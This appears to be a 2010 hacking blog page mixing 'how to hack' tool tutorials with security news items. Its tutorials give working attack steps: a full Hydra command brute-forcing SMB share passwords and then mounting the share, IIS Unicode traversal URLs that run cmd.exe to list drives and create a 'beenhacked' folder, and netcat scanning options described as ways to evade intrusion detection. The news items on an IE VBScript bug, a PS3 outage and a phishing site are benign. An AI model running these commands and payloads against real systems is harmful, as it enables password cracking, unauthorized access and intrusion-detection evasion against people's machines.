Change the Single target to the new target. Change the Port from Cisco to 139. (After all, we are looking for SMB Shares). Select the Show Attempts and Be Verbose options.

Select the Passwords tab and Change the Username. Change the password to either a specific password for the account or to a password file. There are applications designed to create password files, but if you need to create one manually simply create a text file in the directory containing Hydra with passwords containing one password per line.
Click Start. The results will be displayed. Hydra will attempt each password from the password file for the username given. If the correct password is in the file, Hydra will let you know. In this example, the password for the username kermit is 123.

Now our next step will be to create a directory that Linux can associate with the target’s share by typing:

mkdir hacker
Next is to mount the shared directory on the target. You can find out the share name (Personal) using the LANguard application.
Type in the username for the share.

Type in the password for the share. Verify that the Linux machine can view the contents of the target’s shared folder.

By looking at the shared directory on the target we can verify that the Linux machine is actually looking at the contents of the share on the target.

If xhydra will not install on your version of Linux. In this case, you would type:

./hydra 172.16.1.40 smb –s 139 –v –V –l kermit –P passwordlist1 –t 36

The results from the command line are identical to the xhydra.
*Note: There are literally thousands of open shares existing on the Internet, and thousands of those are left unprotected unintentionally. One of the biggest reasons for this is that the owner is not educated in the area of security and is dependent upon his or her ISP or even the router “out-of-the-box” for their security needs.


If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

How to Identify CGI Vulnerabilities using TCS CGI Scanner

The TCS Common Gateway Interface (CGI) Scanner application is designed to find targets that have vulnerable CGI Script errors. These errors are normally due to systems that have not been patched or updated.
Click to highlight the default target of htpp://www.tpp.ru and click on the at the top left of the application to delete the current target.

On the gray bar along the top left of the application, enter the IP address or hostname of the target and click on the gray-colored arrow to insert the new target. Repeat this process for multiple targets. The TCS CGI Scanner is now ready to scan the target.
In this example, each script run against the target is displayed with the result to the right. The ones of interest are any with a 200 as this indicates a successful attempt.
To execute, right-click on a script and left-click on Copy String. Open Internet Explorer and paste the line in the address bar. Press the Enter key. The directory listing of the target’s C: drive will appear.

The line that should be in the address bar is:

http://172.16.1.40/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

To list the contents of the Program Files directory, edit the address bar to

http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1

Create directory command within the script:

http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked

Notice that the beenhacked directory is now created in the root of the C: drive on the target.
The gray bar along the top right of the application allows you to enter custom scripts for the application to check against the target. If you wanted to check the Program Files directory or create a beenhacked directory on each target it is capable of compromising, you could enter these scripts here and click the downward-pointing arrow to enter the script into the application. Repeat this process for multiple targets.

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Penetration Testing

How to hack FTP Servers: Locate Anonymous FTP Servers using FTPScanner


FTPScanner: The FTPScanner application will locate FTP servers that allow Anonymous connections to occur. These servers must be using the default FTP port of 21 in order for the scanner to detect the server. The biggest concern with FTP is that the data be sent unencrypted (also known as clear text). An attacker that intercepts this clear text can easily read all data within the communication.

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

Be careful before pressing F1 key in Windows XP

The software giant Microsoft has told Windows XP users not to press the F1 key when prompted by a Web site, as part of a security advisory

The advisory has been issued regarding an unpatched vulnerability that hackers could exploit to hijack PCs running Internet Explorer (IE). In the advisory, Microsoft confirmed the unpatched bug in VBScript that Polish researcher Maurycy Prodeus had revealed last week.

"The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer. If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user. On systems running Windows Server 2003, Internet Explorer Enhanced Security Configuration is enabled by default, which helps to mitigate against this issue," reads the advisory.

Recently, Prodeus called the bug a "logic flaw," and said attackers could exploit it by feeding users malicious code disguised as a Windows help file and convincing them to press the F1 key when a pop-up appeared. Such files have a ".hlp" extension.

Windows 2000, Windows XP and Windows Server 2003 are impacted by the bug, said Microsoft, and any supported versions of Internet Explorer (IE) on those operating systems, including IE6 on Windows XP, could be exploited by hackers.

The security advisory said, "Our analysis shows that if users do not press the F1 key on their keyboard, the vulnerability cannot be exploited."

Users can also thwart the attacks by disabling Windows Help.

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News, Microsoft Security Updates, Software Bugs

What is Cyberwar Anyway? A Conversation with Jeff Carr, Author of Inside Cyber Warfare

TNNI: You recently authored a book called Inside Cyber Warfare. Tell us a little about the book. What was your motivation for writing it?
Carr: What I tried to do with the book was take a more complex view of the scope of cyber warfare and really even the misnomer of cyber warfare, because there really isn’t any legal definition as such. There is a cyber component to an actual act of war, but in terms of a battle in cyberspace, we have not really seen that and there is no real definition to that. Instead, the book looks at the various ways that state and non-state actors interact in cyberspace, in order to exercise control or to commit crime or do espionage or any number of actions that network systems now enable actors to do.

TNNI: One of the areas that you just touched on was defining cyber war. Do you think we will ever reach a point where there is a commonly accepted definition, particularly in the international realm?
Carr: Probably. I imagine in time such a thing will occur, it is going to take an awful long time. The biggest problem is that the existing models of what treaties do is something that might not work for cyberspace, and I touch on this in the book.
In my view it is more of a law enforcement issue rather than an issue that can be prescribed through a treaty regime similar to way that Weapons of Mass Destruction are controlled. I think those treaties will just not be effective for cyberspace. However, I do hope that one day the principal nations will agree on the principals of a collaborative law enforcement effort to crackdown on abuses that are committed in that plane.

TNNI: Do you find cyber attacks to be a predominately the work of nation-sates or do you also see this as a proliferation of nationalist hackers, and who do you think poses the greater threat?
Carr: I don’t think hackers are going to waste time with anything that does not yield some type of profit. So then it really becomes the question of what was targeted. That is how Grey Logic looks at attribution when it comes to cyber espionage; what have we tied it to what was taken, who would have reason to have entered or accessed it; it has value to what party? Then you can start narrowing the field.

For full story click here

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

Income Tax Phishing Site- Beware

The above is one of the mails you may receive in your mail box which will redirect you to the below page..BEWARE…
In the Tax Refund Online Form – all fields were compulsory to be filled – like card number, bank account details, Credit card CVV number & ATM PIN etc


See the web address of FAKE SITE (PHISHING SITE)

This is the Official website Income Tax Deaprtment of India, see the difference


NEVER EVER GIVE YOUR DEBIT / CREDIT CARD CVV / CVV2 and EXPIRY DATE TO ANYONE, NOT EVEN TO THE BANK OR A GOVERNMENT OFFICIAL NEITHER ON PHONE OR ONLINE FORM or IN ANY FORM

Beware of Phishing sites. It can cost you all your money.


If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Phishing Attack

Tuesday, March 2, 2010

I think you all must be aware, what can happen if you caught while hacking or trying to expose any pic/mms on social networking site like Facebook or Orkut.

Visit this link on Youtube and a look how a

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News, Hacking Videos

How to scan a target for open ports and services using Netcat, SuperScan, Strobe

Netcat: The netcat application has many uses; one is the ability to scan a target for open ports and services. Another utility, cryptcat, is almost identical except that it operates with encryption.

From a DOS prompt, type the following with the syntax of:

Other useful commands for Netcat

The –v option instructs netcat to run in verbose mode, allowing you to see the progress of the scan.
The –r option instructs netcat to randomize local and remote ports in an attempt to elude any intrusion detection systems.
The –w2 option instructs netcat to wait 2 seconds between each port scanned to help elude any intrusion detection systems.
The –z option instructs netcat to operate in a zero-I/O (Input/Output) mode. It is best to use the –z when scanning with netcat.
The 1-1024 instructs netcat to scan port 1-1024.

*Note: 7, 13, 17, 9, and 19 as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.

SuperScan: SuperScan has the ability to discover which ports are open on the target. Identifying the open ports tells an attacker what ports are available for potential exploit.

Accept the default installation of SuperScan. The installation will occur and the SuperScan application will start.

Strobe: The Strobe application identifies ports open on the target. By identifying the ports available this gives an attacker a potential hole to attempt to punch through and compromise the computer and/or network. Remember that all commands in Linux are case sensitive.

For the Windows-based version install and execute with the following syntax:

./strobe (Target IP)

From the Linux directory containing the compressed file type tar –zxvf strobe103.tar.gz. The files will uncompress into a new directory named strobe. Change to the new directory by typing cd strobe and pressing Enter. From the new directory type make install and press Enter.
To execute Strobe against the target in this example: ./strobe 172.16.1.40

The Strobe application will now execute against the target.


If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

How to hack LAN: Learn How to Identify Target Information on the LAN using LanSpy

Countermeasures: Host-based firewalls, uninstall/disable unnecessary services

Description: The LanSpy application attempts to identify targets within a LAN and from the results of the information identifies the target’s IP address, MAC address, hostname, and probable operating system used, among other information.

From the LanSpy application enter the target IP address. Click on the Green Arrow to start the scan. The results of the scan will be displayed.
If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

How to hack LAN: Learn How to Identify Target Information on the LAN using Passifist

Prerequisites: Compile the Linux script

Countermeasures: Host-based firewalls

Description: The passifist application attempts to identify targets within a Local Area Network (LAN) by listening in passive mode on the LAN and from the results of the information identifies the target’s IP address, MAC address, hostname, and probable operating system used.

Procedure:

Step 1: Download passifist file type tar –zxvf passifist_src_1.0.6.tgz.

Step 2: The contents will be extracted into a new directory named passifist. Change to the new directory by typing cd passifist and pressing Enter. From the passifist directory type ./configure and press Enter.
The script will compile to the specific machine it is installed on.

Type in make and press Enter.

Initiate the passive discovery with the following syntax:

./passifist –I eth0 –U "provider=TXT:
filename=foobar.txt"

The results in this example identified seven targets on the LAN. From the options entered when the passifist application was started, the results were saved in a text file named foobar.txt within the directory passifist resides in.

The foobar.txt file the results identified as shon below


*Note: Remember that the objective is to gather as much information as possible about the target. All of this information is useful to an attacker as it identifies what targets are available and helps guide the attacker in the appropriate direction.

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Tools and Softwares

Cyber Space Jihad: An internal Review on Cyber Space cold war

Enrique Salem, President and Chief Executive Officer of California-based Symantec Corporation, warns against a cold war of an unusual kind.

Mr. Salem said cyber space was the battlefield for this war, and might prove a huge threat to virtually the whole world.

The spread of the Internet and the move towards virtualisation to reap operational efficiency has seen a rapid growth in cyber storage. From individuals to corporates and Governments – enterprises have increasingly begun storing their data in cyber space. However, data is far from safe here. According to Mr. Salem, there are definite signs that data on the cyber space was under attack from tech-savvy hackers. He asserted that cyber attacks have become increasingly frequent. “Indian companies also are attacked and targeted,’’ Mr. Salem pointed out.

The real challenge lay in finding out ways to protect the ‘crown jewel’. Considered a critical infrastructure data, the ‘crown jewel’ usually would constitute about 10-15 per cent of total data. Discussing a range of issues on the subject, Mr. Salem said cyber attacks came from within and without. With China and India registering robust GDP growth rates, they were vulnerable to data threats from external hackers, he said. To a question, he said there was greater awareness in India on the possibilities of increased attacks on cyber storage.

Driving innovation, putting in place reputation-based securities and moving towards next generation security technology were among the ways by which Symantec would strive to stay ahead of canny hackers and protect attacks on IP (intellectual property) and critical infrastructure data, he said.

SOURCE: The Hindu

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

Microsoft warns of new bug affecting IE users

Microsoft warned Monday of a new vulnerability that affects Internet Explorer users, saying that it could be exploited by hackers to install malicious software on a victim's computer.

The flaw lies in the way Microsoft's VBScript works with Windows Help Files in Internet Explorer. But for an attack to work, the victim must press the computer's F1 key, Microsoft said. "Our analysis shows that if users do not press the F1 key on their keyboard, the vulnerability cannot be exploited."

This type of attack is considered harder to pull off because of this F1 key requirement, but Web-based attacks have emerged as a major source of malicious software over the past few years.

The bug was discovered by security researcher Maurycy Prodeus, who posted details of the attack on Friday.

It affects Windows 2000, Windows XP and Windows Server 2003.

Microsoft has not seen the flaw exploited in any online attacks to date, the company said Monday. Microsoft did not say whether it will fix the bug in its next set of security updates, due March 9, but it usually needs more than a couple of weeks to test and release new security patches.

SOURCE: http://www.computerworld.com

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Software Bugs

Monday, March 1, 2010

PS3 users warned not to use consoles as '8001050f error' crashes network

PS3 owners have been warned not to touch their consoles as 'error: 8001050f' message causes Playstation Network meltdown across the globe.
PS3 gamers across the world have woken up to find their consoles unable to connect online.

In some cases, users have even experienced problems playing offline, as well as finding that Trophy data and saved information had been corrupted by the error.

The 'error: 8001050f' message is thought to be related to the a calendar reset on February 28, when the original PS3 systems were reset to January 1, 2000

Sony have recognised the problem via their Twitter page, posting the following advice for users:

"We're aware that many of you are having problems connecting to PSN, and yes, we're looking into it. Stay tuned for updates."

PS3 games like Red Faction have been affected by the network meltdown
Users with the newer PS3 Slim models are unaffected, but it has been advised that users with older PS3 models should not use their console until further notice.

SOURCE: http://www.metro.co.uk

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News

Microsoft confirms zero day bug

Software giant Microsoft has confirmed it's investigating an unpatched Windows XP bug that allows hackers could exploit to plant malware on Windows XP machines running Internet Explorer.

Maurycy Prodeus, the Polish security analyst with iSEC Security Research announced on Friday that the flaw could be used by attackers to inject malicious code onto victims' PCs.

Those using Windows XP and IE7 or IE8 are at risk, Prodeus warned.

Redmond said that it is investigating the vulnerability involving the use of VBScript and Windows Help files within Internet Explorer.

Jerry Bryant, a senior manager with the Microsoft Security Response Center (MSRC) has confirmed that Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2, are not affected.
He did say that Redmond has not seen the attack exploited yet.

The bug is a "logic flaw," which attackers could exploit it by feeding users malicious code disguised as a Windows help file. It then convinces them to press the F1 key when a pop-up appeared.

It is a bit tricky to pull off because the attacker needs to force a victim to visit a malicious Web page.

Other insecurity experts have confirmed that the exploit works.

SOURCE: TechEye

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Microsoft Security Updates, Software Bugs

25,000 new viruses popping up on the web each day

From 20 new viruses popping up on the web each day 10 years ago to 25,000 new viruses a day this year, the exponential growth of online security threats pose a big problem for many financial services firms.

According to new research by security software provider Symantec, many companies have spent an average US$2 million a year fixing or preventing cyber attacks - an amount that keeps growing as online fraud become more sophisticated.

Symantec found in the global study that 9 in 10 Australian and New Zealand companies have been the subject of cyber attacks in the past 12 months. Not surprisingly, 43 per cent of those surveyed ranked security as their top issue, ahead of natural disasters, terrorism and traditional crime.

The scale of the problem is highlighted by Symantec's study, which found all of the 2,100 businesses surveyed across 27 countries suffered a cyber attack in January this year.

Hitting the financial services sector in particular were the Conficker virus and the Silentbanker Trojan. In Australia and New Zealand, a third of those surveyed ranked these viruses as somewhat, if not highly, effective, at causing serious IT problems.

"The fraud and crime happening overall are escalating. Banks are getting attacked every day and the frequency of these attacks are rising, too," said Craig Scroggie, vice president and managing director - Pacific region, for Symantec.

The clean-up costs can be in the millions, said Scroggie. "The cost could be the data loss, or if it's about a company's online shopfront getting attacked and they have to shut it down, you're talking about loss of revenue streams," he added.

One way banks and other financial services firms can avoid these costs is to implement the right IT policy. For example, software security firms knew about the Conficker virus before it spread around the globe - but unless a firm have a strict policy about regularly updating their security program, it would be a case of ‘too little, too late'.

As the old saying goes, prevention is better than the cure, which is why Scroggie said part of Symantec's services is to alert companies about potential online threats before they happen.

SOURCE: http://www.financialstandard.com.au

If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here
|
Geared by Amarjit Singh
For more articles similar to this post visit @ Hacking News
Newer Posts Older Posts Home
Subscribe to: Posts (Atom)